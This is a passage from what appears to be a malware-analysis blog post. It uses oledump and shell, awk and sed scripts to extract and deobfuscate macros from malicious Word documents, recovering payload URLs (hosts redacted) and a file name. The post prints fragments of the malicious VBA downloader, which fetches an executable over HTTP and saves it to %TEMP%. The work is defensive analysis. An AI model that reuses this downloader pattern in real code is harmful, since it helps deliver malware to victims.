  mkdir "$TMPDIR"
  # extract each macro stream to a file named after its module
  oledump.py "$docfile" |grep ": [Mm]" |tr -s " " |cut -d' ' -f2,5 |tr -d "':" |sed 's# .*/# #' |while read stream file; do
    /usr/local/oledump/oledump.py -s "$stream" -v "$docfile" > "$TMPDIR/$file"
  done
  for f in "$TMPDIR"/*; do
    if grep "Array\|Open.*AddFieldToField(" "$f" > /dev/null; then
      # remove the code skipped by GoTo statements
      cat "$f" |tr -d "\015" |awk '
        /^[ ]*GoTo[ ]/ {
          # goto statement: extract label
          dstlabel = $2;
          dontprint = 1;
        }
        (dontprint == 0) {
          print;
        }
        /:$/ {
          # found label
          label = $0;
          sub(":$","",label);
          if (label == dstlabel) dontprint = 0;
        }
      ' > "${f}.tidy"
      # prefix the URL with the name of the document that it came from
      printf "%s: " "$docfile"
      grep "Array\|Open.*AddFieldToField(" "${f}.tidy" |sed '/Array(/N;s/.*Array(\([^)]*\))\n.*AddFieldToField([^,]*, *\([0-9]*\).*/\1 \2/;s/, */ /g' |awk '
        {
          for (i = 1;i < NF;i++) {
            printf("%c",$i - 8854 - $NF - 500 - 3 * $NF - 500);
          }
          printf("\n");
        }'
    fi
  done
done
[/code]
The script contains some extra code at the beginning to generate a unique directory name to store the extracted macros in, but apart from that it is pretty much the same as the script snippets presented throughout this post. There is a loop wrapped around the whole script to allow processing of multiple files (specify multiple file names on the command line):
[code]
$ ./extracturls.sh *.doc
copier@malwaremusings.com_20160129_084903(11).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(14).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(15).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(16).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(17).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(18).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(19).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(1).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(3).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(4).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(5).doc: http://<hidden>.org/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(6).doc: http://<hidden>.de/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(8).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
copier@malwaremusings.com_20160129_084903(9).doc: http://<hidden>.com/u56gf2d/k76j5hg.exe
[/code]
We could even get it to output the SHA256 hash (it is calculating it anyway to create the temporary directory) of each document too, as you could then match the document up with an output directory and have a look at the macro code contained therein. This post is getting quite long though, so I’ll leave that as an exercise for the reader.
Just before I finish though, if you look back through the macro code, you’ll see references to a mandata[] array (except Visual Basic uses ‘()’ to index an array rather than ‘[]’, but if I do that, it’ll look like a function), and since it is passed as a parameter to functions like CreateObject(), it would be handy to know what the contents of the array are.
Right near the top of the macro code we have:
[code]
Public Sub CargarFichProc(NombreFichero As String)
…
mandata = Split(UserForm1.ComboBox1.Text, NombreFichero)
…
End Sub
[/code]
You’ll also remember seeing the following in the ThisDocument stream:
[code]
Sub autoopen()
CargarFichProc "/"
End Sub
[/code]
So the mandata[] array is created by Split()ing UserForm1.ComboBox1.Text on the ‘/’ character. At this point I thought I was a tad stuck and was going to have to open the document in Word… but then I had a thought: what if we check the Word document for strings? Since the Split() function is splitting the string on a ‘/’ character, we can probably use grep(1) to limit the output to strings containing a ‘/’:
[code]
$ strings copier@malwaremusings.com_20160129_084903\(13\).doc |grep "/"
…
_B_var_sCN/
_B_var_PrefLINX/K0
_B_var_ClavePNIFU/s0
Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/
Document=ThisDocument/&H00000000
[/code]
What is that I see on the second-to-last line? A number of strings which look like they want to be passed to a CreateObject() function! Note that if you are curious and want to know where the string was actually stored within the Word document CDF file, you can unzip the CDF file using the 7z(1) command and find the string in the file ./Macros/UserForm1/o. This could be handy to know for scripting the extraction of such form data in the future.
Quickly then, because it’s past my dinner time and I’m getting hungry, here’s a script that generates a sed(1) script to change the mandata[] array references in the Module2.tidy file (created above) to the strings extracted from the Word document:
[code]
idx=0
strings copier@malwaremusings.com_20160129_084903\(13\).doc |grep "^Microsoft\." |sed 's#/$##' |tr "/" "\012" |while read string; do
echo "s/mandata($idx)/\"$string\"/g"
idx="`expr $idx + 1`"
done |sed -f - Module2.tidy > Module2.tidier
[/code]
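To make it clearer what gets fed to that final sed(1), here is a sketch that generates the substitution commands from a shortened copy of the string and applies them to one line of macro code. It is a variation rather than the script above: gen_mandata_sed is a made-up name, and it numbers the elements with awk's NR instead of an expr(1) counter.

```shell
# gen_mandata_sed: read a "/"-separated string on stdin and print one sed(1)
# substitution per element, numbered from 0 like the VB Split() result.
gen_mandata_sed() {
    sed 's#/$##' | tr '/' '\012' |
    awk '{ printf("s/mandata(%d)/\"%s\"/g\n", NR - 1, $0) }'
}

# Shortened copy of the string found in the document.
script=$(printf '%s\n' 'Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/' | gen_mandata_sed)
printf '%s\n' "$script"

# Apply the generated script to a line of macro code.
printf '%s\n' 'Set ShaBADA1_2 = CreateObject(mandata(1))' | sed "$script"
```

The generated script is one ‘s’ command per array element, so mandata(1) in the sample line should come out as the second element of the string, in double quotes.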
If you look at the Module2.tidier file you can get more of an idea as to what the macro code is doing:
[code]
Set ShaBADA1_1 = CreateObject("Microsoft.XMLHTTP")
Set ShaBADA1_2 = CreateObject("Adodb.Stream")
Set ShaBADA1_6 = CreateObject("Shell.Application")
Set hokuk = CreateObject("WScript.Shell")
Set ShaBADA1_3 = hokuk.Environment("Process")
…
ShaBADA1_1.Open "GET", AddFieldToField(ShaBADA1_7, 47), False
ShaBADA1_1.Send
ShaBADA1_4 = ShaBADA1_3("TEMP")
ShaBADA1_5 = ShaBADA1_4 + "\perdoma.exe"
[/code]
Ah ha. Now we could go a step further and substitute Microsoft.XMLHTTP for ShaBADA1_1; Adodb.Stream for ShaBADA1_2 etc., but that’ll take more time and make this post even longer. We have enough information to be able to block downloads of the payload, and to look for indicators of compromise (although I’d be guessing that that perdoma.exe will delete itself after running) so let’s stop there. We can now see that the macro is doing:
[code]
Microsoft.XMLHTTP.Open("GET",AddFieldToField(ShaBADA1_7,47),False)
[/code]
… so an HTTP GET on the deobfuscated Array data, and from the looks of it saving it to %TEMP%\perdoma.exe (the code to save it is in Module1), and on that note, I’m going to save some food to my stomach.
So there you have it. Analysis of a malicious Microsoft Word document resulting in the extraction of payload URLs and a file name, using Didier Stevens’ oledump and standard UNIX (I haven’t used bash(1) extensions, so it should run on Solaris too, although I suspect that I may have used some GNU extensions in awk(1), which will require gawk(1) on Solaris) commands.